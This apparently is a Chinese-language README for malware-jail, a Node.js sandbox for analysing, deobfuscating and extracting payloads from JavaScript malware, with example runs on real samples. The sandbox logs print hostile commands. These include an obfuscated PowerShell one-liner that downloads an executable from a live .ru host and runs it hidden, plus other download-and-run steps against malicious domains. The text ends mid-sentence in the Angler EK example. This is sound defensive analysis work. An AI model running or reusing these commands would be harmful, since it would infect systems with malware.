HynekPetrak/malware-jail

# malware-jail 用于半自动 Javascript 恶意软件分析、反混淆和 payload 提取的沙箱。为 Node.js 编写。 malware-jail 是为 [Node 的 'vm' 沙箱](https://nodejs.org/api/vm.html) 编写的。目前实现了 WScript (Windows Scripting Host) 上下文 [env/wscript.js](https://github.com/HynekPetrak/malware-jail/blob/master/env/wscript.js)，至少实现了恶意软件经常使用的部分 。Internet 浏览器上下文已部分实现 [env/browser.js](https://github.com/HynekPetrak/malware-jail/blob/master/env/browser.js)。 可在任何操作系统上运行。在 Linux 和 Node.js v6.6.0 上开发并测试。 由于使用了一些 ES6 特性，您需要 Node.js >= 6.x。 ## 新特性 ### 版本 0.19 将 WMI 查询枚举到文件中：[wmis.json](https://github.com/HynekPetrak/malware-jail/blob/master/malware/20161013/out/wmis.json) ### 版本 0.17 添加了新参数： ``` --t404 - http requests always return HTTP/404 and throws an exception. This enables enumerating of all remote URLs. ``` ### 版本 0.16 URL 现在被保存到 urls.json 中。请参阅最新的 [EXAMPLES#malware-of-issue-14](https://github.com/HynekPetrak/malware-jail/blob/master/EXAMPLES.md#malware-of-issue-14)。 各种错误修复和改进。 ### 版本 0.14 各种错误修复和改进。 ### 版本 0.13 添加了新参数： ``` -t msecs - limits execution time by "msecs" miliseconds, by default 60 seconds. --h404 - http requests always return HTTP/404 and does not throw an exception. This enables enumerating of all remote URLs. ``` ## 安装 您需要安装 [Node.js](https://nodejs.org) 和 [npm](https://npmjs.org/)。 malware-jail 构建在 [minimist](https://www.npmjs.com/package/minimist)、[iconv-lite](https://github.com/ashtuchkin/iconv-lite) 和 [entities](https://www.npmjs.com/package/entities) 之上。 ### 从 GitHub 拉取 使用 git 拉取源代码： ``` git clone https://github.com/HynekPetrak/malware-jail.git cd malware-jail ``` 然后使用以下命令安装所有依赖项： ``` npm install ``` ### NPM 包 尚未提供，即将推出... ## 警告 ## 用法 ``` bash@linux# node jailme.js -h -b list 7 May 20:54:52 - malware-jail, a malware sandbox ver. 0.19 7 May 20:54:52 - ------------------------ 7 May 20:54:52 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-c ./config.json] \ 7 May 20:54:52 - [-o ofile] [-b id] \ 7 May 20:54:52 - [-s odir] [--down] [malware1 [malware2] .. ] 7 May 20:54:52 - -c config .. use alternative config file, preceed with ./ 7 May 20:54:52 - -e ifile ... js that simulates specific environment 7 May 20:54:52 - -o ofile ... name of the file where sandbox shall be dumped at the end 7 May 20:54:52 - -s odir ... output directory for generated files (malware payload) 7 May 20:54:52 - -b id ... browser type, use -b list for possible values 7 May 20:54:52 - -t msecs ... number of miliseconds before terminating execution, default 1 minute 7 May 20:54:52 - --trace ... print stack trace with every log line 7 May 20:54:52 - --down ... allow downloading malware payloads from remote servers 7 May 20:54:52 - --h404 ... on download return always HTTP/404 7 May 20:54:52 - malware ... js with the malware code 7 May 20:54:52 - If no arguments are specified the default values are taken from config.json 7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ] ``` 在 examples 文件夹中，您可以找到一个已禁用的恶意软件文件。使用以下命令运行分析： ``` node jailme.js -c ./config_wscript_only.json --down=y malware/example.js ``` 基于 Internet 浏览器的恶意软件，您可以使用以下命令进行测试 ``` node jailme.js -b IE11_W10 malware/example_browser.js ``` 在分析结束时，完整的沙箱上下文将被转储到 _'sandbox\_dump\_after.json'_ 文件中。 您可能需要检查 _'sandbox\_dump\_after.json'_ 的以下条目： * _eval\_calls_ - 所有 eval() 调用参数的数组。如果 eval() 被用于反混淆，这会很有用。 * _wscript\_saved\_files_ - 恶意软件试图释放的所有文件的内容。实际文件也会保存到 output/ 目录中。 * _wscript\_urls_ - 恶意软件打算 GET 或 POST 的所有 URL。 * _wscript\_objects_ - 创建的 WScript 或 ActiveX 对象。 _'sandbox\_dump\_after.json'_ 使用 [JSONPath](http://goessner.net/articles/JsonPath/)（由 [JSON-js/cycle.js](https://github.com/douglascrockford/JSON-js) 实现）来保存对同一对象的重复或循环引用。 ## 示例输出 ``` bash@linux# node jailme.js malware/example.js 11 Jan 00:06:24 - Malware sandbox ver. 0.2 11 Jan 00:06:24 - ------------------------ 11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js 11 Jan 00:06:24 - Malware files: malware/example.js 11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json 11 Jan 00:06:24 - Output directory for generated files: output/ 11 Jan 00:06:24 - ==> Preparing Sandbox environment. 11 Jan 00:06:24 - => Executing: env/eval.js 11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls. 11 Jan 00:06:24 - => Executing: env/wscript.js 11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment. 11 Jan 00:06:24 - ==> Executing malware file(s). 11 Jan 00:06:24 - => Executing: malware/example.js 11 Jan 00:06:24 - ActiveXObject(WScript.Shell) 11 Jan 00:06:24 - Created: WScript.Shell[1] 11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%) 11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP) 11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2] 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data 11 Jan 00:06:24 - ActiveXObject(ADODB.Stream) 11 Jan 00:06:24 - Created: ADODB_Stream[3] 11 Jan 00:06:24 - ADODB_Stream[3].Open() 11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes 11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2) 11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer) 11 Jan 00:06:24 - ADODB_Stream[3].Close() 11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file. 11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll 11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf 11 Jan 00:08:42 - Generated file saved 11 Jan 00:08:42 - Generated file saved 11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json ``` 在上面的示例中，payload 已被提取到 output/_TEMP__49629482.dll 和 output/_TEMP__38611354.pdf 中 ## 示例 [malware](malware) 文件夹包含真实的恶意软件样本。其中大部分从 https://malwr.com 下载。 有关恶意软件样本的完整索引，请参阅 [EXAMPLES](EXAMPLES.md)。 ### 示例：分析 Wileen.js 从 malwr.com 获取恶意脚本：[Wileen.js](https://malwr.com/analysis/NTVkZDQ4MGZkZWE4NDAyM2EwODEyMDM3MDhjMDI1MTQ/) 显然，如果在浏览器中运行，该恶意软件不会执行： ``` if (typeof document == "undefined") { ``` 因此，您可能需要使用一个不加载浏览器/DOM 组件的备用配置文件： ``` node jailme.js --down=y -c ./config_wscript_only.json malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js ``` Powershell 的有趣用法： ``` 1 Oct 13:05:34 - => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js 1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll) 1 Oct 13:05:34 - Created: WScript.Shell[1] 1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe', false, undefined) 1 Oct 13:05:34 - ==> Cleaning up sandbox. 1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file. 1 Oct 13:05:34 - The sandbox context has been saved to: sandbox_dump_after.json ``` 日志文件：[malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out](malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out) ### 示例：分析 ORDER-10455.js 从 malwr.com 获取恶意 JavaScript：[ORDER-10455.js](https://malwr.com/analysis/NDU1ZDA4NmY3ZGUyNDczZjg0ODU2OGZiZTMxNjA5NzE/) 首先在不与远程服务器交互的情况下运行： ``` node jailme.js malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js ``` 您会得到类似以下内容： ``` ... 29 Sep 23:17:21 - Calling eval() no.: 5 29 Sep 23:17:21 - ActiveXObject(MSXML2.XMLHTTP) 29 Sep 23:17:21 - Created: MSXML2.XMLHTTP[9] 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].open(GET,http://caopdjow.top/user.php?f=0.dat,false) 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) 29 Sep 23:17:21 - MSXML2.XMLHTTP[9] Not sending data, if you want to interact with remote server, set --down=y 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].responseBody = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)' 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status = '200' 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) finished 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status.get() => 200 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated) 29 Sep 23:17:21 - ActiveXObject(Scripting.FileSystemObject) 29 Sep 23:17:21 - Scripting.FileSystemObject[10] created. 29 Sep 23:17:21 - Scripting.FileSystemObject[10].GetSpecialFolder(2) 29 Sep 23:17:21 - ActiveXObject(ADODB.Stream) 29 Sep 23:17:21 - Created: ADODB_Stream[11] 29 Sep 23:17:21 - ADODB_Stream[11].Open() 29 Sep 23:17:21 - ADODB_Stream[11].Type = '1' 29 Sep 23:17:21 - ADODB_Stream[11].content = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)' 29 Sep 23:17:21 - ADODB_Stream[11].Write(str) - 10000 bytes 29 Sep 23:17:21 - ADODB_Stream[11].size = '10000' 29 Sep 23:17:21 - ADODB_Stream[11].Position = '0' 29 Sep 23:17:21 - ADODB_Stream[11].SaveToFile(Special_Folder__2\w8z05i7y2.exe, 2) 29 Sep 23:17:21 - ADODB_Stream[11].content.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated) 29 Sep 23:17:21 - ADODB_Stream[11].Close() 29 Sep 23:17:21 - ActiveXObject(WScript.Shell) 29 Sep 23:17:21 - Created: WScript.Shell[12] 29 Sep 23:17:21 - WScript.Shell[12].Run(Special_Folder__2\w8z05i7y2.exe, undefined, undefined) 29 Sep 23:17:21 - Returning: 'undefined' 29 Sep 23:17:21 - ==> Cleaning up sandbox. 29 Sep 23:17:21 - ==> Script execution finished, dumping sandbox environment to a file. 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated) 29 Sep 23:17:21 - Saving: output/Special_Folder__2_w8z05i7y2.exe 29 Sep 23:17:21 - Generated file saved 29 Sep 23:17:21 - The sandbox context has been saved to: sandbox_dump_after.json ``` 这似乎是反混淆的“标准”行为，目的是最终下载一个 exe 二进制文件并执行它。 如果我们想获取真实的 payload，请使用 '--down=y' 运行它： ``` node jailme.js --down=y malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js > malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out ``` 日志文件：[malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out](malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out) ### 示例：分析 Norri.js 从 malwr.com 获取恶意 JavaScript：[Norri.js](https://malwr.com/analysis/Mjc0ZjUyMjZhYzg4NDJlYmEwNzBkMTAxODA5NGYwZGM/) 运行： ``` node jailme.js --down=y malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js ``` 您会得到： ``` 30 Sep 01:02:11 - => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js 30 Sep 01:02:11 - Strict mode: false 30 Sep 01:02:11 - Calling eval() no.: 1 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell) 30 Sep 01:02:11 - Created: WScript.Shell[9] 30 Sep 01:02:11 - WScript.SpecialFolders(Desktop) 30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk) 30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk) 30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk 30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject) 30 Sep 01:02:11 - Scripting.FileSystemObject[11] created. 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell) 30 Sep 01:02:11 - Created: WScript.Shell[12] 30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP) 30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13] 30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream) 30 Sep 01:02:11 - Created: ADODB_Stream[14] 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/ 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15] 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0) 30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false' 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined) 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200 30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)' 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200' 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished 30 Sep 01:02:15 - ADODB_Stream[14].type = '1' 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated) 30 Sep 01:02:15 - ADODB_Stream[14].Open() 30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)' 30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes 30 Sep 01:02:15 - ADODB_Stream[14].size = '196608' 30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined) 30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... (truncated) 30 Sep 01:02:15 - ADODB_Stream[14].Close() 30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined) 30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js) 30 Sep 01:02:15 - ==> Cleaning up sandbox. 30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file. 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated) 30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15] 30 Sep 01:02:16 - Generated file saved 30 Sep 01:02:16 - The sandbox context has been saved to: sandbox_dump_after.json ``` 从日志中可以看出其行为很明显。Payload 已被提取到 output/TemporaryFolder_TempFile[15] 文件中。 日志文件：[malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out](malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out) ### 示例：分析 Angler EK 从 [ANGLER EK SENDS CRYPTOWALL](http://www.malware-traffic-analysis.net/2015/12/21/index.html) 的 pcap 文件中下载并提取 Angler EK，放入 [malware/angler/angler_full.html](malware/angler/angler_full.html)。 去除非 Angler 部分，并另存为 [malware/angler/angler_stripped.html](malware/angler/angler_stripped.html)。 移除 `